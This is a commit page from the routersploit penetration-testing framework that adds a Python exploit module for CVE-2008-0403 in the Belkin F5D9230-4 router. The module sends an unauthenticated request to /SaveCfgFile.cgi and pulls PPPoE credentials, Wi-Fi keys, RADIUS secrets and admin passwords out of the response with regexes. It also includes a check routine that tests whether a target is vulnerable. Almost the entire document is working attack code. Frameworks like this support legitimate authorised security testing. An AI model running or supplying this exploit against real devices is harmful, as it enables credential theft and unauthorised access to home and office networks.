Belkin G Plus Information Disclosure exploit

10fe92a3 · Marcin Bury · b93b7f8c · 10fe92a3
Commit 10fe92a3 authored Apr 04, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 74 additions and 0 deletions

g_plus_info_disclosure.py ...rsploit/modules/exploits/belkin/g_plus_info_disclosure.py +74 -0

No files found.
--- a/routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
+++ b/routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
+import requests
+import re
+
+from routersploit import *
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability.
+    If the target is vulnerable, sensitive information such as credentials are returned.
+    """
+    __info__ = {
+        'name': 'Belkin G Info Disclosure',
+        'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
+        'authors': [
+            'DarkFig', # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+        ],
+        'references': [
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403',
+            'https://www.exploit-db.com/exploits/4941/',
+        ],
+        'targets': [
+            'Belkin G',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
+
+        try:
+            r = requests.get(url, verify=False)
+            res = r.text
+        except requests.exceptions.ConnectionError:
+            print_error("Connection error: %s" % url)
+            return
+
+        var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
+
+        data = []
+        for v in var:
+            regexp = '{}="(.+?)"'.format(v)
+
+            val = re.findall(regexp, res)
+            if len(val):
+                data.append((v, val[0]))
+
+        if len(data):
+            print_success("Exploit success")
+            headers = ("Option", "Value")
+            print_table(headers, *data)
+
+        else:
+            print_error("Exploit failed")
+
+    def check(self):
+        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
+
+        try:
+            r = requests.get(url, verify=False)
+            res = r.text
+        except:
+            return None # could not verify
+
+        var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
+
+        if any(map(lambda x: x in res, var)):
+            return True   # target vulnerable
+
+        return False # target is not vulnerable
+